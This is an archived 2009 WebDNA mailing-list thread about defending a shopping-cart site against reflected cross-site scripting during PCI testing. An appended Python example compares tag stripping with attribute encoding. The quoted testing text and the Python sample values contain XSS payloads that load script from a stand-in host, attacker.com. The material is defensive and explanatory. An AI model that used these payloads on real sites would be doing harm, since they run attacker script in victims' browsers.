Re: [WebDNA] PCI Vulnerability testing

This WebDNA talk-list message is from 2009.


Associated Messages, from the most recent to the oldest:

  1. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  2. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  3. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  4. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  5. Re: [WebDNA] PCI Vulnerability testing (Jeffrey Jones 2009)
  6. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  7. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  8. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  9. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  10. Re: [WebDNA] PCI Vulnerability testing ("Psi Prime, Matthew A Perosi " 2009)
  11. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  12. Re: [WebDNA] PCI Vulnerability testing (Govinda 2009)
  13. Re: [WebDNA] PCI Vulnerability testing (Marc Thompson 2009)
  14. Re: [WebDNA] PCI Vulnerability testing (William DeVaul 2009)
  15. [WebDNA] PCI Vulnerability testing (Bob Minor 2009)
I have no idea about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do?

Bill

On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor wrote:
> What are people doing for the following type of attacks?
>
> http://www.example.com/shoppingcart.tpl?cart=""
>
> I assume you could just do a [removehtml][cart][/removehtml]
>
> I know you can do something like that at the code level but is there
> something that can be done at the server level or does the new version
> cicadae have built in protections?
>
> More info on the attack
>
>> http://www.example.com/?var="%20SRC="http://www.attacker.com/xss.js">
>> This will exploit the reflected cross site scripting vulnerability shown
>> before, executing the javascript code stored on the attacker's web server as
>> if it was originating from the victim web site, www.example.com.
>> A complete test will include instantiating a variable with several attack
>> vectors (Check Fuzz vectors appendix and Encoded injection appendix).
>> Finally, analyzing answers can get complex. A simple way to do this is to
>> use code that pops up a dialog, as in our example. This typically indicates
>> that an attacker could execute arbitrary JavaScript of his choice in the
>> visitors' browsers.
>

William DeVaul
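To make the difference between the two suggestions in this thread concrete, here is an added Python example (not WebDNA, and not code from any of the posters) that echoes a constructed parameter value into a quoted attribute two ways: tag stripping in the spirit of [removehtml], and attribute encoding, which is the role escaping with [url] or an HTML-entity encoder plays. It assumes a hypothetical template that places the `var` parameter inside `value="..."`, and it checks with Python's own HTML parser whether the value stayed inside that attribute.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample values, modelled on the vector quoted in the thread.
# The first contains no angle brackets at all: it only closes the attribute.
ATTR_BREAKOUT = '" SRC="http://www.attacker.com/xss.js'
TAG_PAYLOAD = '<script src="http://www.attacker.com/xss.js"></script>'

# Hypothetical template that echoes the ?var= parameter into an attribute.
TEMPLATE = '<input type="text" name="var" value="{value}">'

TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value: str) -> str:
    """Tag stripping in the spirit of [removehtml]: drops <...> sequences only."""
    return TAG_RE.sub("", value)


def encode_attr(value: str) -> str:
    """Context-aware encoding: &, <, >, double and single quotes become
    entities, so the value can never terminate the attribute it sits in."""
    return html.escape(value, quote=True)


def render(value: str, sanitizer) -> str:
    """Echo the sanitized parameter into the template, as the page would."""
    return TEMPLATE.format(value=sanitizer(value))


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser-side parser sees on the <input>."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def rendered_input_attrs(markup: str) -> dict:
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def stays_in_attribute(value: str, sanitizer) -> bool:
    """True when the sanitized value is confined to value="...": the parsed
    element carries exactly the template's three attributes and nothing else."""
    attrs = rendered_input_attrs(render(value, sanitizer))
    return set(attrs) == {"type", "name", "value"}
```

Tag stripping removes the `<script>` form of the payload but leaves the attribute breakout untouched, so the parsed element gains a `src` attribute; entity encoding keeps both payloads inside `value`, where they are inert text.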
